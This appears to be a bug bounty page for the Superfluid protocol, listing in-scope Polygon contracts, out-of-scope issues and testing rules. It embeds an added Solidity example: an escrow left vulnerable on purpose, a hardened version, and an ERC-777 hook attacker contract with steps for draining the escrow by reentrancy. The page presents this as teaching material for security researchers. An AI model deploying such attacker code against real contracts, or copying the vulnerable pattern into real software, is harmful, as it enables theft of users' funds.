The Superfluid protocol provides an ERC20-compatible token standard called Super Token that lets tokens do more, namely money streaming, money distribution and on-chain cashflow automation (aka the Super App Framework).
In Scope
Contract | Target | Type | Severity | Reward |
---|---|---|---|---|
Resolver | https://polygonscan.com/address/0xE0cc76334405EE8b39213E620587d815967af39C | Smart Contract | Critical | Bounty |
Host | https://polygonscan.com/address/0x3E14dC1b13c488a8d5D310918780c983bD5982E7 | Smart Contract | Critical | Bounty |
Governance | https://polygonscan.com/address/0x3ad3f7a0965ce6f9358ad5cce86bc2b05f1ee087 | Smart Contract | Critical | Bounty |
CFAv1 | https://polygonscan.com/address/0x6EeE6060f715257b970700bc2656De21dEdF074C | Smart Contract | Critical | Bounty |
IDAv1 | https://polygonscan.com/address/0xB0aABBA4B2783A72C52956CDEF62d438ecA2d7a1 | Smart Contract | Critical | Bounty |
SuperTokenFactory | https://polygonscan.com/address/0x2C90719f25B10Fc5646c82DA3240C76Fa5BcCF34 | Smart Contract | Critical | Bounty |
SuperfluidLoader v1 | https://polygonscan.com/address/0x15F0Ca26781C3852f8166eD2ebce5D18265cceb7 | Smart Contract | Critical | Bounty |
TOGA | https://polygonscan.com/address/0x1b18770E5198983AF04B3735d01E09A57d27bD43 | Smart Contract | Critical | Bounty |
MATICx - SETH Super Token | https://polygonscan.com/address/0x3aD736904E9e65189c3000c7DD2c8AC8bB7cD4e3 | Smart Contract | Critical | Bounty |
ETHx - Super Token Wrapper | https://polygonscan.com/address/0x27e1e4E6BC79D93032abef01025811B7E4727e85 | Smart Contract | Critical | Bounty |
RIC - Custom Super Token | https://polygonscan.com/address/0x263026e7e53dbfdce5ae55ade22493f828922965 | Smart Contract | Critical | Bounty |
IN-SCOPE: SMART CONTRACT VULNERABILITIES
We are looking for evidence of, and the root cause behind, incorrect behavior of the smart contracts that could lead to unintended functionality:
- Stealing or loss of funds
- Unauthorized transactions
- Transaction manipulation
- Attacks on logic (the behavior of the code differs from the business description)
- Reentrancy
- Transaction reordering
- Integer over- and underflows
OUT OF SCOPE: SMART CONTRACT VULNERABILITIES
- Incorrect data supplied by third-party oracles
  - This does not exclude oracle manipulation or flash-loan attacks, which remain in scope
- Basic economic governance attacks (e.g. 51% attack)
- Lack of liquidity
- Best-practice critiques
- Sybil attacks
- Spam attacks
- Centralization risks
- Issues without a proof of concept are out of scope
The following known issues are considered to be out of scope:
- Gas griefing, specifically by spam attacks
- Gas griefing, specifically in Super App termination callbacks
- Reentrancy issues arising from the fact that:
  - the Super App framework allows callbacks
  - Super Token is an ERC-777 token, which also allows callbacks (token hooks)
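The two callback vectors above are properties of the standards, so a report that only points out that the hooks exist will not qualify; the program asks for a concrete, reproducible path to unintended behavior such as loss of funds. The following added example (written for this page; it is not Superfluid code, and `NaiveEscrow`, `SafeEscrow` and `HookReentrant` are hypothetical contracts) shows what the ERC-777 hook actually lets a recipient do: an escrow that updates its accounting after an outgoing transfer is re-entered from `tokensReceived()`, and the checks-effects-interactions version beside it closes the hole. It assumes an ERC-777-compatible token (OpenZeppelin-style, where the ERC20 `transfer()` path also fires the recipient hook when one is registered) and the canonical ERC-1820 registry address.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added illustration for this page; none of these contracts are Superfluid's.
// Interfaces follow EIP-777 and EIP-1820; the registry address is the canonical
// ERC-1820 deployment shared by EVM chains.

interface IERC1820Registry {
    function setInterfaceImplementer(address account, bytes32 interfaceHash, address implementer) external;
}

interface IERC777Recipient {
    function tokensReceived(address operator, address from, address to, uint256 amount,
                            bytes calldata userData, bytes calldata operatorData) external;
}

interface IERC20 {
    function transfer(address to, uint256 amount) external returns (bool);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

// Hypothetical escrow holding an ERC-777-compatible token (e.g. a Super Token).
// Bug: the balance is zeroed AFTER the external transfer. An ERC-777 token calls the
// recipient's tokensReceived() hook inside transfer(), so a malicious recipient runs
// while its balance is still credited and can call withdrawAll() again.
contract NaiveEscrow {
    IERC20 public immutable token;
    mapping(address => uint256) public balances;

    constructor(IERC20 _token) {
        token = _token;
    }

    function deposit(uint256 amount) external {
        require(token.transferFrom(msg.sender, address(this), amount), "transferFrom failed");
        balances[msg.sender] += amount;
    }

    function withdrawAll() external {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        require(token.transfer(msg.sender, amount), "transfer failed"); // recipient hook fires here
        balances[msg.sender] = 0;                                        // effect written too late
    }
}

// Hardened version: effects before interactions, plus a guard that also covers the
// tokensToSend() hook a depositor could run during transferFrom() in deposit().
contract SafeEscrow {
    IERC20 public immutable token;
    mapping(address => uint256) public balances;
    bool private locked;

    modifier nonReentrant() {
        require(!locked, "reentrant call");
        locked = true;
        _;
        locked = false;
    }

    constructor(IERC20 _token) {
        token = _token;
    }

    function deposit(uint256 amount) external nonReentrant {
        require(token.transferFrom(msg.sender, address(this), amount), "transferFrom failed");
        balances[msg.sender] += amount;
    }

    function withdrawAll() external nonReentrant {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        balances[msg.sender] = 0; // effect first: a re-entrant call now fails the require above
        require(token.transfer(msg.sender, amount), "transfer failed");
    }
}

// Attacker-controlled recipient. It registers itself in the ERC-1820 registry as the
// ERC777TokensRecipient implementer for its own address, so every ERC-777 transfer to it
// invokes tokensReceived(), where it re-enters NaiveEscrow.withdrawAll().
contract HookReentrant is IERC777Recipient {
    IERC1820Registry internal constant REGISTRY =
        IERC1820Registry(0x1820a4B7618BdE71Dff98e6C6A6f3e9CbC1eD76A);
    bytes32 internal constant RECIPIENT_HASH = keccak256("ERC777TokensRecipient");

    NaiveEscrow public immutable target;
    uint256 public depth; // bounded so the demonstration terminates instead of running out of gas

    constructor(NaiveEscrow _target) {
        target = _target;
        REGISTRY.setInterfaceImplementer(address(this), RECIPIENT_HASH, address(this));
    }

    function tokensReceived(address, address from, address, uint256, bytes calldata, bytes calldata)
        external override
    {
        // Only react to payouts coming from the escrow, and only a few levels deep.
        if (from == address(target) && depth < 3) {
            depth++;
            target.withdrawAll(); // re-entry: balances[this] is still non-zero in NaiveEscrow
        }
    }
}
```

To reproduce against NaiveEscrow: fund the escrow with deposits from other accounts, have HookReentrant approve the token and deposit some amount, then call `withdrawAll()` from HookReentrant; each nested hook invocation drains the same amount again before the outer call finally zeroes the balance. Against SafeEscrow the nested call reverts on "reentrant call" (and, even without the guard, on "nothing to withdraw"), which is the distinction between "callbacks exist" (known, out of scope) and a demonstrable loss of funds (what the program is asking for).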
- Avoid web application scanners that search for vulnerabilities automatically; they generate massive traffic
- Make every effort not to damage or restrict the availability of products, services or infrastructure
- Avoid compromising any personal data and avoid interrupting or degrading any service
- Do not access or modify other users' data; confine all tests to your own accounts
- Perform testing only within the scope
- Do not exploit any DoS/DDoS vulnerabilities, social engineering attacks or spam
- Do not spam forms or account creation flows using automated scanners
- If you find a chain of vulnerabilities, we pay only for the vulnerability with the highest severity
- Do not break any law and stay within the defined scope
- Details of any vulnerability found must not be communicated to anyone who is not a member of the HackenProof Team or an authorized employee of this Company without appropriate permission
- Do not discuss this program or any vulnerabilities (even resolved ones) outside of the program without express consent from the organization
- No vulnerability disclosure, not even partial, is allowed for the moment
- Please do NOT publish or discuss bugs
We are happy to thank everyone who submits valid reports that help us improve our security. However, only reports that meet the following eligibility requirements may receive a monetary reward:
- You must be the first reporter of the vulnerability
- The vulnerability must be a qualifying vulnerability
- Any vulnerability found must be reported no later than 24 hours after discovery and exclusively through hackenproof.com
- You must send a clear textual description of the report along with steps to reproduce the issue, including attachments such as screenshots or proof-of-concept code as necessary
- You must not be a current or former employee of the company or of one of its contractors
- ONLY USE YOUR HackenProof ADDRESS (in case of violation, no bounty can be awarded)
- Provide detailed but to-the-point reproduction steps